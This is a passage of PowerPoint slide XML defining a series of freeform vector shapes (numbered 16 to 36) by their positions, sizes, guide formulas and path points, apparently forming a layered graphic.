                      <a:pt x="201" y="420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" name="Freeform 16"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877524" y="2196946"/>
                <a:ext cx="260472" cy="420118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 186 w 186"/>
                  <a:gd name="T1" fmla="*/ 0 h 300"/>
                  <a:gd name="T2" fmla="*/ 134 w 186"/>
                  <a:gd name="T3" fmla="*/ 273 h 300"/>
                  <a:gd name="T4" fmla="*/ 0 w 186"/>
                  <a:gd name="T5" fmla="*/ 300 h 300"/>
                  <a:gd name="T6" fmla="*/ 186 w 186"/>
                  <a:gd name="T7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6" h="300">
                    <a:moveTo>
                      <a:pt x="186" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="134" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186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" name="Freeform 17"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6095984" y="2014895"/>
                <a:ext cx="481732" cy="623174"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 344"/>
                  <a:gd name="T1" fmla="*/ 420 h 445"/>
                  <a:gd name="T2" fmla="*/ 77 w 344"/>
                  <a:gd name="T3" fmla="*/ 0 h 445"/>
                  <a:gd name="T4" fmla="*/ 344 w 344"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 0 w 344"/>
                  <a:gd name="T7" fmla="*/ 420 h 445"/>
                  <a:gd name="T8" fmla="*/ 0 w 344"/>
                  <a:gd name="T9" fmla="*/ 420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4" h="445">
                    <a:moveTo>
                      <a:pt x="0" y="420"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420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" name="Freeform 18"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6133794" y="2108721"/>
                <a:ext cx="385106" cy="495739"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 275"/>
                  <a:gd name="T1" fmla="*/ 334 h 354"/>
                  <a:gd name="T2" fmla="*/ 62 w 275"/>
                  <a:gd name="T3" fmla="*/ 0 h 354"/>
                  <a:gd name="T4" fmla="*/ 275 w 275"/>
                  <a:gd name="T5" fmla="*/ 354 h 354"/>
                  <a:gd name="T6" fmla="*/ 0 w 275"/>
                  <a:gd name="T7" fmla="*/ 334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354">
                    <a:moveTo>
                      <a:pt x="0" y="334"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="334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" name="Freeform 19"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5814507" y="2603060"/>
                <a:ext cx="763210" cy="85424"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 201 w 545"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 545 w 545"/>
                  <a:gd name="T3" fmla="*/ 25 h 61"/>
                  <a:gd name="T4" fmla="*/ 351 w 545"/>
                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 545"/>
                  <a:gd name="T7" fmla="*/ 39 h 61"/>
                  <a:gd name="T8" fmla="*/ 201 w 545"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 201 w 545"/>
                  <a:gd name="T1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5" h="61">
                    <a:moveTo>
                      <a:pt x="201" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="545" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0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" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="3363473"/>
                <a:ext cx="1541823" cy="61617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 1101 w 1101"/>
                  <a:gd name="T3" fmla="*/ 18 h 44"/>
                  <a:gd name="T4" fmla="*/ 674 w 1101"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 0 w 1101"/>
                  <a:gd name="T7" fmla="*/ 29 h 44"/>
                  <a:gd name="T8" fmla="*/ 376 w 1101"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 376 w 1101"/>
                  <a:gd name="T1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01" h="44">
                    <a:moveTo>
                      <a:pt x="376" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1101" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="674" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="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" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5453207" y="2754302"/>
                <a:ext cx="616169" cy="649782"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 376 w 440"/>
                  <a:gd name="T1" fmla="*/ 435 h 464"/>
                  <a:gd name="T2" fmla="*/ 440 w 440"/>
                  <a:gd name="T3" fmla="*/ 0 h 464"/>
                  <a:gd name="T4" fmla="*/ 199 w 440"/>
                  <a:gd name="T5" fmla="*/ 48 h 464"/>
                  <a:gd name="T6" fmla="*/ 0 w 440"/>
                  <a:gd name="T7" fmla="*/ 464 h 464"/>
                  <a:gd name="T8" fmla="*/ 376 w 440"/>
                  <a:gd name="T9" fmla="*/ 435 h 464"/>
                  <a:gd name="T10" fmla="*/ 376 w 440"/>
                  <a:gd name="T11" fmla="*/ 435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0" h="464">
                    <a:moveTo>
                      <a:pt x="376" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="440" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="464"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="435"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:cu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" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5509223" y="2797714"/>
                <a:ext cx="519543" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 177 w 371"/>
                  <a:gd name="T1" fmla="*/ 38 h 406"/>
                  <a:gd name="T2" fmla="*/ 371 w 371"/>
                  <a:gd name="T3" fmla="*/ 0 h 406"/>
                  <a:gd name="T4" fmla="*/ 315 w 371"/>
                  <a:gd name="T5" fmla="*/ 381 h 406"/>
                  <a:gd name="T6" fmla="*/ 0 w 371"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 177 w 371"/>
                  <a:gd name="T9" fmla="*/ 38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1" h="406">
                    <a:moveTo>
                      <a:pt x="177" y="38"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="371" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="38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" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5979752" y="2754302"/>
                <a:ext cx="1015279" cy="634378"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 725"/>
                  <a:gd name="T1" fmla="*/ 435 h 453"/>
                  <a:gd name="T2" fmla="*/ 64 w 725"/>
                  <a:gd name="T3" fmla="*/ 0 h 453"/>
                  <a:gd name="T4" fmla="*/ 507 w 725"/>
                  <a:gd name="T5" fmla="*/ 30 h 453"/>
                  <a:gd name="T6" fmla="*/ 725 w 725"/>
                  <a:gd name="T7" fmla="*/ 453 h 453"/>
                  <a:gd name="T8" fmla="*/ 0 w 725"/>
                  <a:gd name="T9" fmla="*/ 435 h 453"/>
                  <a:gd name="T10" fmla="*/ 0 w 725"/>
                  <a:gd name="T11" fmla="*/ 435 h 4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5" h="453">
                    <a:moveTo>
                      <a:pt x="0" y="435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="725" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="435"/>
                    </a:ln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" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6017562" y="2792113"/>
                <a:ext cx="920053" cy="561557"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 657"/>
                  <a:gd name="T1" fmla="*/ 384 h 401"/>
                  <a:gd name="T2" fmla="*/ 57 w 657"/>
                  <a:gd name="T3" fmla="*/ 0 h 401"/>
                  <a:gd name="T4" fmla="*/ 465 w 657"/>
                  <a:gd name="T5" fmla="*/ 26 h 401"/>
                  <a:gd name="T6" fmla="*/ 657 w 657"/>
                  <a:gd name="T7" fmla="*/ 401 h 401"/>
                  <a:gd name="T8" fmla="*/ 0 w 657"/>
                  <a:gd name="T9" fmla="*/ 384 h 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7" h="401">
                    <a:moveTo>
                      <a:pt x="0" y="384"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="384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" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5096109" y="3544123"/>
                <a:ext cx="857035" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 541 w 612"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 612 w 612"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 195 w 612"/>
                  <a:gd name="T5" fmla="*/ 17 h 473"/>
                  <a:gd name="T6" fmla="*/ 0 w 612"/>
                  <a:gd name="T7" fmla="*/ 422 h 473"/>
                  <a:gd name="T8" fmla="*/ 541 w 612"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 541 w 612"/>
                  <a:gd name="T11" fmla="*/ 473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2" h="473">
                    <a:moveTo>
                      <a:pt x="541" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="612" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="473"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3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" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5146523" y="3579133"/>
                <a:ext cx="767411" cy="592366"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 548"/>
                  <a:gd name="T1" fmla="*/ 376 h 423"/>
                  <a:gd name="T2" fmla="*/ 175 w 548"/>
                  <a:gd name="T3" fmla="*/ 16 h 423"/>
                  <a:gd name="T4" fmla="*/ 548 w 548"/>
                  <a:gd name="T5" fmla="*/ 0 h 423"/>
                  <a:gd name="T6" fmla="*/ 485 w 548"/>
                  <a:gd name="T7" fmla="*/ 423 h 423"/>
                  <a:gd name="T8" fmla="*/ 0 w 548"/>
                  <a:gd name="T9" fmla="*/ 376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8" h="423">
                    <a:moveTo>
                      <a:pt x="0" y="376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="548" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="376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" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5853717" y="3544123"/>
                <a:ext cx="1539023" cy="662385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 473 h 473"/>
                  <a:gd name="T2" fmla="*/ 71 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 473"/>
                  <a:gd name="T4" fmla="*/ 878 w 1099"/>
                  <a:gd name="T5" fmla="*/ 11 h 473"/>
                  <a:gd name="T6" fmla="*/ 1099 w 1099"/>
                  <a:gd name="T7" fmla="*/ 440 h 473"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 473 h 473"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 473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99" h="473">
                    <a:moveTo>
                      <a:pt x="0" y="473"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="71" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="878" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="473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" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5892928" y="3577733"/>
                <a:ext cx="1445197" cy="595167"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1032"/>
                  <a:gd name="T1" fmla="*/ 0 h 425"/>
                  <a:gd name="T2" fmla="*/ 835 w 1032"/>
                  <a:gd name="T3" fmla="*/ 11 h 425"/>
                  <a:gd name="T4" fmla="*/ 1032 w 1032"/>
                  <a:gd name="T5" fmla="*/ 393 h 425"/>
                  <a:gd name="T6" fmla="*/ 0 w 1032"/>
                  <a:gd name="T7" fmla="*/ 425 h 425"/>
                  <a:gd name="T8" fmla="*/ 64 w 1032"/>
                  <a:gd name="T9" fmla="*/ 0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2" h="425">
                    <a:moveTo>
                      <a:pt x="64" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="835" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1032" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="425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" name="Freeform 29"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5019088" y="4244319"/>
                <a:ext cx="2457675" cy="161045"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1755"/>
                  <a:gd name="T1" fmla="*/ 36 h 115"/>
                  <a:gd name="T2" fmla="*/ 1052 w 1755"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 1755 w 1755"/>
                  <a:gd name="T5" fmla="*/ 64 h 115"/>
                  <a:gd name="T6" fmla="*/ 576 w 1755"/>
                  <a:gd name="T7" fmla="*/ 115 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 1755"/>
                  <a:gd name="T9" fmla="*/ 36 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 1755"/>
                  <a:gd name="T11" fmla="*/ 36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55" h="115">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1052" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1755" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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" name="Freeform 30"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4747414" y="4294733"/>
                <a:ext cx="1078296" cy="838835"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 194 w 770"/>
                  <a:gd name="T1" fmla="*/ 0 h 599"/>
                  <a:gd name="T2" fmla="*/ 770 w 770"/>
                  <a:gd name="T3" fmla="*/ 79 h 599"/>
                  <a:gd name="T4" fmla="*/ 692 w 770"/>
                  <a:gd name="T5" fmla="*/ 599 h 599"/>
                  <a:gd name="T6" fmla="*/ 0 w 770"/>
                  <a:gd name="T7" fmla="*/ 394 h 599"/>
                  <a:gd name="T8" fmla="*/ 194 w 770"/>
                  <a:gd name="T9" fmla="*/ 0 h 599"/>
                  <a:gd name="T10" fmla="*/ 194 w 770"/>
                  <a:gd name="T11" fmla="*/ 0 h 5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70" h="599">
                    <a:moveTo>
                      <a:pt x="194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="770" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="0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chemeClr val="accent2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" name="Freeform 31"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4796427" y="4331144"/>
                <a:ext cx="990072" cy="759013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 707"/>
                  <a:gd name="T1" fmla="*/ 353 h 542"/>
                  <a:gd name="T2" fmla="*/ 173 w 707"/>
                  <a:gd name="T3" fmla="*/ 0 h 542"/>
                  <a:gd name="T4" fmla="*/ 707 w 707"/>
                  <a:gd name="T5" fmla="*/ 74 h 542"/>
                  <a:gd name="T6" fmla="*/ 637 w 707"/>
                  <a:gd name="T7" fmla="*/ 542 h 542"/>
                  <a:gd name="T8" fmla="*/ 0 w 707"/>
                  <a:gd name="T9" fmla="*/ 353 h 5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7" h="542">
                    <a:moveTo>
                      <a:pt x="0" y="353"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="173" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="637" y="542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" name="Freeform 32"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5716480" y="4333944"/>
                <a:ext cx="2078171" cy="799624"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 86 w 1638"/>
                  <a:gd name="T3" fmla="*/ 56 h 630"/>
                  <a:gd name="T4" fmla="*/ 0 w 1638"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 1638 w 1638"/>
                  <a:gd name="T7" fmla="*/ 481 h 630"/>
                  <a:gd name="T8" fmla="*/ 1388 w 1638"/>
                  <a:gd name="T9" fmla="*/ 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38" h="630">
                    <a:moveTo>
                      <a:pt x="1388" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                      <a:pt x="86" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                      <a:pt x="0" y="630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="500"/>
                      <a:pt x="1091" y="531"/>
                      <a:pt x="1638" y="481"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0"/>
                      <a:pt x="1388" y="0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" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5755691" y="4367554"/>
                <a:ext cx="1985745" cy="729604"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 1565"/>
                  <a:gd name="T1" fmla="*/ 55 h 574"/>
                  <a:gd name="T2" fmla="*/ 1341 w 1565"/>
                  <a:gd name="T3" fmla="*/ 0 h 574"/>
                  <a:gd name="T4" fmla="*/ 1565 w 1565"/>
                  <a:gd name="T5" fmla="*/ 431 h 574"/>
                  <a:gd name="T6" fmla="*/ 1427 w 1565"/>
                  <a:gd name="T7" fmla="*/ 443 h 574"/>
                  <a:gd name="T8" fmla="*/ 608 w 1565"/>
                  <a:gd name="T9" fmla="*/ 518 h 574"/>
                  <a:gd name="T10" fmla="*/ 0 w 1565"/>
                  <a:gd name="T11" fmla="*/ 574 h 574"/>
                  <a:gd name="T12" fmla="*/ 78 w 1565"/>
                  <a:gd name="T13" fmla="*/ 55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65" h="574">
                    <a:moveTo>
                      <a:pt x="78" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                      <a:pt x="1341" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                      <a:pt x="1565" y="431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                      <a:pt x="1427" y="443"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="1184" y="466"/>
                      <a:pt x="608" y="518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                      <a:pt x="0" y="574"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78" y="5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" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4673193" y="4964121"/>
                <a:ext cx="3211082" cy="389309"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 337 w 2293"/>
                  <a:gd name="T1" fmla="*/ 0 h 278"/>
                  <a:gd name="T2" fmla="*/ 0 w 2293"/>
                  <a:gd name="T3" fmla="*/ 27 h 278"/>
                  <a:gd name="T4" fmla="*/ 723 w 2293"/>
                  <a:gd name="T5" fmla="*/ 278 h 278"/>
                  <a:gd name="T6" fmla="*/ 2293 w 2293"/>
                  <a:gd name="T7" fmla="*/ 111 h 278"/>
                  <a:gd name="T8" fmla="*/ 1846 w 2293"/>
                  <a:gd name="T9" fmla="*/ 20 h 278"/>
                  <a:gd name="T10" fmla="*/ 745 w 2293"/>
                  <a:gd name="T11" fmla="*/ 121 h 278"/>
                  <a:gd name="T12" fmla="*/ 337 w 2293"/>
                  <a:gd name="T13" fmla="*/ 0 h 278"/>
                  <a:gd name="T14" fmla="*/ 337 w 2293"/>
                  <a:gd name="T15" fmla="*/ 0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93" h="278">
                    <a:moveTo>
                      <a:pt x="337" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="723" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2293" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1846" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="0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" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4429526" y="5001931"/>
                <a:ext cx="1256145" cy="1095107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 174 w 897"/>
                  <a:gd name="T1" fmla="*/ 0 h 782"/>
                  <a:gd name="T2" fmla="*/ 165 w 897"/>
                  <a:gd name="T3" fmla="*/ 18 h 782"/>
                  <a:gd name="T4" fmla="*/ 0 w 897"/>
                  <a:gd name="T5" fmla="*/ 357 h 782"/>
                  <a:gd name="T6" fmla="*/ 817 w 897"/>
                  <a:gd name="T7" fmla="*/ 782 h 782"/>
                  <a:gd name="T8" fmla="*/ 897 w 897"/>
                  <a:gd name="T9" fmla="*/ 251 h 782"/>
                  <a:gd name="T10" fmla="*/ 174 w 897"/>
                  <a:gd name="T11" fmla="*/ 0 h 782"/>
                  <a:gd name="T12" fmla="*/ 174 w 897"/>
                  <a:gd name="T13" fmla="*/ 0 h 7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7" h="782">
                    <a:moveTo>
                      <a:pt x="174" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="897" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="0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" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4474339" y="5043943"/>
                <a:ext cx="1173522" cy="1002681"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 838"/>
                  <a:gd name="T1" fmla="*/ 317 h 716"/>
                  <a:gd name="T2" fmla="*/ 154 w 838"/>
